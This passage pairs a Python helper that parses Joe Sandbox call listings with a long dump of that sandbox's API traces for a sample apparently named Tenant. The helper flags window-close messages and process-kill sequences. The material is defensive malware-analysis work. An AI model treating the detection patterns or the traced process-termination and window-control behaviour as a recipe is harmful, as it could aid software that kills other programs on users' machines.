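#     • Part of subcall function 00B071F0: CloseHandle.KERNEL32(...), ref: 00B071FA
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

WM_CLOSE = 0x10              # window message constant (documented Win32 value)
PROCESS_ALL_ACCESS = 0x1F0FFF  # full access mask requested from OpenProcess


@dataclass
class ApiCall:
    func: str
    module: str
    args: Tuple[Optional[object], ...]  # int for hex literals, None for "?" (unknown)
    ref: int                            # address of the call site
    subcall: Optional[int]              # callee address when reported as a subcall


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok  # keep anything the sandbox did not render as hex


def parse_call(line: str) -> Optional[ApiCall]:
    m = CALL_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = tuple(_parse_arg(t) for t in raw.split(",")) if raw else ()
    sub = int(m.group("sub"), 16) if m.group("sub") else None
    return ApiCall(m.group("fn"), m.group("mod"), args, int(m.group("ref"), 16), sub)


def parse_report(text: str) -> List[List[ApiCall]]:
    """Return one list of ApiCall per 'APIs' section (one section per analysed function)."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = []
            blocks.append(current)
        elif s in ("Strings", "Memory Dump Source"):
            current = None  # end of the call listing for this function
        elif current is not None:
            call = parse_call(line)
            if call:
                current.append(call)
    return blocks


def find_wm_close(calls: List[ApiCall]) -> List[ApiCall]:
    """Window-message sends whose uMsg (second argument) is WM_CLOSE."""
    senders = ("PostMessageW", "SendMessageW", "SendMessageTimeoutW")
    return [c for c in calls if c.func in senders and len(c.args) > 1 and c.args[1] == WM_CLOSE]


def find_process_kill(calls: List[ApiCall]) -> bool:
    """True when OpenProcess(PROCESS_ALL_ACCESS, ...) is followed by TerminateProcess."""
    opened = [c for c in calls if c.func == "OpenProcess" and c.args and c.args[0] == PROCESS_ALL_ACCESS]
    killed = [c for c in calls if c.func == "TerminateProcess"]
    return bool(opened) and any(k.ref > o.ref for o in opened for k in killed)


# Constructed sample: two call listings copied from this report's function blocks.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B059B4
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B059CA
• GetWindowThreadProcessId.USER32(?,?), ref: 00B059D9
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059E8
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059F2
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059F9
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00B077FE
• EnterCriticalSection.KERNEL32(?,?,00AAC2B6,?,?), ref: 00B0780F
• TerminateThread.KERNEL32(00000000,000001F6,?,00AAC2B6,?,?), ref: 00B0781C
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AAC2B6,?,?), ref: 00B07829
  • Part of subcall function 00B071F0: CloseHandle.KERNEL32(00000000,?,00B07836,?,00AAC2B6,?,?), ref: 00B071FA
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00B0783C
• LeaveCriticalSection.KERNEL32(?,?,00AAC2B6,?,?), ref: 00B07843
Memory Dump Source
"""

if __name__ == "__main__":
    for i, block in enumerate(parse_report(SAMPLE)):
        closes = [hex(c.ref) for c in find_wm_close(block)]
        print(f"function {i}: {len(block)} calls, WM_CLOSE at {closes}, kills owner: {find_process_kill(block)}")
```

The ordering check in find_process_kill (TerminateProcess must sit at a higher call-site address than OpenProcess) is a cheap stand-in for control-flow order; it holds for straight-line code like the block above but not for a loop or an out-of-line error path, so treat the rule as a triage hint and confirm in the disassembly.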
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00B077FE
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00AAC2B6,?,?), ref: 00B0780F
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00AAC2B6,?,?), ref: 00B0781C
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AAC2B6,?,?), ref: 00B07829
                                                                                          • Part of subcall function 00B071F0: CloseHandle.KERNEL32(00000000,?,00B07836,?,00AAC2B6,?,?), ref: 00B071FA
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B0783C
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00AAC2B6,?,?), ref: 00B07843
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 2ee4ecc746afe70d79d6888e359278204ce972809e70137bf38026cc6a3841b5
                                                                                        • Instruction ID: 65c38432de1258fb2e99af7f44f00de00725a821d2ef633dcd778f6a3df182b1
                                                                                        • Opcode Fuzzy Hash: 2ee4ecc746afe70d79d6888e359278204ce972809e70137bf38026cc6a3841b5
                                                                                        • Instruction Fuzzy Hash: E8F05832595612ABD7113B64EC9CAAFBB69FF49702B244461F602A60A1CFB56801CB60
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF9555
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00AF9561
                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF956A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF9572
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF957B
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00AF9582
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 0071397d9cdd40f54e4eac5180770f240ba7e6853cc1df5d170d1d1652d1b435
                                                                                        • Instruction ID: ced705ebf1531a744b434b851aacc33604db721d481091142b2926dc1484f3c5
                                                                                        • Opcode Fuzzy Hash: 0071397d9cdd40f54e4eac5180770f240ba7e6853cc1df5d170d1d1652d1b435
                                                                                        • Instruction Fuzzy Hash: 8CE0E536014505BBDB012FE2EC1C95EBF39FF49B22B204220F22592470CF32A460DB50
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B18CFD
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B18E0C
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B18F84
                                                                                          • Part of subcall function 00B07B1D: VariantInit.OLEAUT32(00000000), ref: 00B07B5D
                                                                                          • Part of subcall function 00B07B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00B07B66
                                                                                          • Part of subcall function 00B07B1D: VariantClear.OLEAUT32(00000000), ref: 00B07B72
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: 37c8543490f67999a4fdcefb7abe0ccacad9b26ea8ca7262f13be9abe9eb5e80
                                                                                        • Instruction ID: 0167614c0692d6b01990424324019fdd5603dbb5db9d844c62a4c7bcb6b98d12
                                                                                        • Opcode Fuzzy Hash: 37c8543490f67999a4fdcefb7abe0ccacad9b26ea8ca7262f13be9abe9eb5e80
                                                                                        • Instruction Fuzzy Hash: 69919C716083019FC710DF24C58099ABBF5FF89354F5489AEF89A8B3A2DB31E945CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                        • _memset.LIBCMT ref: 00B0332E
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0335D
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B03410
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B0343E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: 846078983b685ec2705f9cfed7f8dcf149d100dca288d592c16cfac948e93324
                                                                                        • Instruction ID: 0343461d9cec5e0a7c0d7d9f78533b37f766c17744b91878b538d3a6a1853f57
                                                                                        • Opcode Fuzzy Hash: 846078983b685ec2705f9cfed7f8dcf149d100dca288d592c16cfac948e93324
                                                                                        • Instruction Fuzzy Hash: 8451EF316083009FC7169E28C989A6FBFECEF45B54F040AADF891972D2DB20CE448756
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B02F67
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B02F83
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00B02FC9
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B67890,00000000), ref: 00B03012
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: e9302c02e26b6816a40f9d4146bf8f73bb4d38ad5457e6d6153ce10a1a1ec006
                                                                                        • Instruction ID: 67fac127a7a007042f2fe73ee7c87ce335c0d407f26cbba4f77e11bd639f6257
                                                                                        • Opcode Fuzzy Hash: e9302c02e26b6816a40f9d4146bf8f73bb4d38ad5457e6d6153ce10a1a1ec006
                                                                                        • Instruction Fuzzy Hash: D841B1312053419FD720DF24C898B5ABFE8EF84750F10469DF565972D1EB70EA05CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AF9ACC
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AF9ADF
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AF9B0F
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 365058703-1403004172
                                                                                        • Opcode ID: 5cf046f207381a8d0ff3fcddd676b04f40c04a4dba03f54a8db30679aa5906e0
                                                                                        • Instruction ID: 8a412fc50a2966afb994587ca452fb29def481de5117644b8b7dd069f02079d8
                                                                                        • Opcode Fuzzy Hash: 5cf046f207381a8d0ff3fcddd676b04f40c04a4dba03f54a8db30679aa5906e0
                                                                                        • Instruction Fuzzy Hash: B8212371A01108BFDB14ABE4DC96EFFBBBCDF51360F104219F921A32E1DB3459098660
                                                                                        APIs
                                                                                          • Part of subcall function 00AA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                          • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                          • Part of subcall function 00AA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B26A86
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B26A8D
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B26AA2
                                                                                        • DestroyWindow.USER32(?), ref: 00B26AAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: e62cd11e4d30debd28262c8f032d05cee32ae65a7a7ed2a15dcb407e16f63411
                                                                                        • Instruction ID: e2c6aad0b03932550427784b43fa878fa1a1749e66c391e9f894de87f7806753
                                                                                        • Opcode Fuzzy Hash: e62cd11e4d30debd28262c8f032d05cee32ae65a7a7ed2a15dcb407e16f63411
                                                                                        • Instruction Fuzzy Hash: F1218B71200215AFEF108E64EC81EBB77EDEF6A324F208658FA59A3194D7719C519760
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00B07377
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B073AA
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00B073BC
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B073F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 08096ee1cdffeaccdae6965b63ed16b551046db91d833cd274241ba1efe70170
                                                                                        • Instruction ID: aa2acefec231b6eda0dfc2d5893ec41d1fc9c7b9c22628d06b6c64b8a8d7ede0
                                                                                        • Opcode Fuzzy Hash: 08096ee1cdffeaccdae6965b63ed16b551046db91d833cd274241ba1efe70170
                                                                                        • Instruction Fuzzy Hash: C421717094430AABEB209F65DC45A9ABFE4EF45720F204A99FCA0D72D0DF70A851DB54
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00B07444
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B07476
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00B07487
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B074C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: e28de60d19bbf3ceb2baa82ef4cbdabe404e368bf362d1cfea3505907c1a9a4a
                                                                                        • Instruction ID: 553ba4113c94217573b913d3c2c4ede02d699572913401aadff715ad7823179b
                                                                                        • Opcode Fuzzy Hash: e28de60d19bbf3ceb2baa82ef4cbdabe404e368bf362d1cfea3505907c1a9a4a
                                                                                        • Instruction Fuzzy Hash: 5C21B231948209ABDB209F689C44E9EBFE8EF45720F200A89FDA0E73D1DF70A851C750
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B0B297
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B0B2EB
                                                                                        • __swprintf.LIBCMT ref: 00B0B304
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B30980), ref: 00B0B342
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 09ef6d0465093464c0155afb6de07b158515a5142d77688e6d9ea57b51020f5b
                                                                                        • Instruction ID: 71f58ea07b4e7c9ac8a0da182e11d28300a6f623e15dbaa4727c52c0c82fb39f
                                                                                        • Opcode Fuzzy Hash: 09ef6d0465093464c0155afb6de07b158515a5142d77688e6d9ea57b51020f5b
                                                                                        • Instruction Fuzzy Hash: 44215635600109AFCB10EFA5CD95EAEBBF8EF89704B1040A9F905D7392DB71EA45CB61
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                          • Part of subcall function 00AFAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFAA6F
                                                                                          • Part of subcall function 00AFAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFAA82
                                                                                          • Part of subcall function 00AFAA52: GetCurrentThreadId.KERNEL32 ref: 00AFAA89
                                                                                          • Part of subcall function 00AFAA52: AttachThreadInput.USER32(00000000), ref: 00AFAA90
                                                                                        • GetFocus.USER32 ref: 00AFAC2A
                                                                                          • Part of subcall function 00AFAA9B: GetParent.USER32(?), ref: 00AFAAA9
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00AFAC73
                                                                                        • EnumChildWindows.USER32(?,00AFACEB), ref: 00AFAC9B
                                                                                        • __swprintf.LIBCMT ref: 00AFACB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 1941087503-1110647743
                                                                                        • Opcode ID: 8b79ad39984f7732b0a6c34597bbdec89536387431f101cb73b358d7c9f85063
                                                                                        • Instruction ID: d2ae59f6efa20210b659a6251fbb7f5ca72e0eb7769d1f113301e924906ecff7
                                                                                        • Opcode Fuzzy Hash: 8b79ad39984f7732b0a6c34597bbdec89536387431f101cb73b358d7c9f85063
                                                                                        • Instruction Fuzzy Hash: 3E11D2B5200208ABCF11BFE0CE86FFA376CAF54700F104075FE0CAA142CA7059498B71
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B02318
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                        • API String ID: 3964851224-769500911
                                                                                        • Opcode ID: 04812b317dfa3d585a1f98e5f5a539395ff3ecca4c129a162c20d2f6e234451b
                                                                                        • Instruction ID: 820604c49ddcbc1d97eee6d081752cce79f0741fa9e74da891ec78f34640922b
                                                                                        • Opcode Fuzzy Hash: 04812b317dfa3d585a1f98e5f5a539395ff3ecca4c129a162c20d2f6e234451b
                                                                                        • Instruction Fuzzy Hash: 87113030910118DFCF40EFA4DA559EEB7F8FF15344B5084D9E81567292DB365E0ACB50
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1F2F0
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1F320
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1F453
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B1F4D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
